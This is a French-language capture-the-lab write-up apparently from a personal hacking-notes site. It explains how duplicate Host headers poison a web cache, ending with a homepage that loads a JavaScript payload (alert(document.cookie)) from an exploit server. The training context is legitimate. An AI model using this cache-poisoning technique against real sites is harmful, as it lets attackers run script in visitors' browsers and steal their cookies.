> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/host-header/web-cache-poisoning-via-ambiguous-requests.md).

# Empoisonnement du cache web via des requêtes ambiguës

### Empoisonnement du cache Web via des requêtes ambiguës

**Description du laboratoire**

Ce labo est vulnérable à une **empoisonnement du cache web** en raison de différences dans la manière dont le **système de cache** et **serveur back-end** interprètent les requêtes ambiguës. / Un utilisateur légitime consulte régulièrement la page d'accueil du site.

\*\* Cible :\*\*/ Empoisonner le cache afin que la page d'accueil s'exécute `alert(document.cookie)` dans le navigateur de la victime.

**Observation initiale**

* Les réponses HTTP contiennent un en-tête indiquant un âge de cache de 30 secondes\*\* (`Âge : 30`), confirmant l'utilisation d'un mécanisme de cache.
* Le comportement du serveur varie en fonction de la structure de la requête, en particulier au `Host` en-tête.

<figure><img src="/files/66770a89f8b835e86b892c6bb6492fce9a8de12a" alt=""><figcaption></figcaption></figure>

**Test avec un Host invalide**

En changeant le `Host` en-tête avec une valeur inexistante :

```http
Host: wfwfkowf.com
```

La réponse renvoyée est une erreur Gateway Timeout, ce qui indique que le serveur tente de résoudre cette valeur :

{% code overflow="wrap" %}

```html
<html>
    <head>
        <title>
            Erreur du serveur : Gateway Timeout
        </title>
    </head>
    <body>
        <h1>
            Erreur du serveur : Gateway Timeout (1) lors de la connexion à wfwfkowf.com
        </h1>
    </body>
</html>
```

{% endcode %}

Cette approche est bloquée et ne peut donc pas être exploitée directement

<figure><img src="/files/c3f69b5be8a7462bcf43e24e442af6d8c2290ba9" alt=""><figcaption></figcaption></figure>

**Utilisation de deux en-têtes Host**

Envoi de **deux `Host` en-têtes dans la même requête**:

```http
Host: 0a7600890341e19d80ad0d880001003c.h1-web-security-academy.net
Host: test.com
```

* L'application répond normalement.
* La valeur du **deuxième Host** est reflétée dans la ressource chargée côté client (par exemple dans un `src` attribut).

<figure><img src="/files/77828bea5fc40afb8a9e8fdeb00d52261befc2b5" alt=""><figcaption></figcaption></figure>

Cela révèle une \*\*interprétation\*\* incohérente entre le cache et le back-end

**Préparation de la charge utile**

Sur le serveur d'exploitation, un fichier JavaScript est créé :

/resources/js/tracking.js

Contenu :

```javascript
alert(document.cookie);
```

<figure><img src="/files/ef40a1480e25225f2b22d2ef4a4c62c57c465816" alt=""><figcaption></figcaption></figure>

**Empoisonnement du cache**

Une nouvelle requête est envoyée avec deux `Host` en-têtes, le deuxième pointant vers le serveur d'exploitation :

```http
Host: 0a7600890341e19d80ad0d880001003c.h1-web-security-academy.net
Host: exploit-0a78008803c6e19880480c08010e0021.exploit-server.net
```

* Le back-end accepte la requête.
* Le cache enregistre la réponse empoisonnée.

<figure><img src="/files/14fd3a709b3ea4de7286b4c1640d86bf1be2aaf8" alt=""><figcaption></figcaption></figure>

La page d'accueil fait désormais référence au script JavaScript hébergé sur le serveur de l'attaquant.

<figure><img src="/files/d81db95c7d4ee0a2922abafda9ca0c690d8f6ea9" alt="" width="545"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/host-header/web-cache-poisoning-via-ambiguous-requests.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
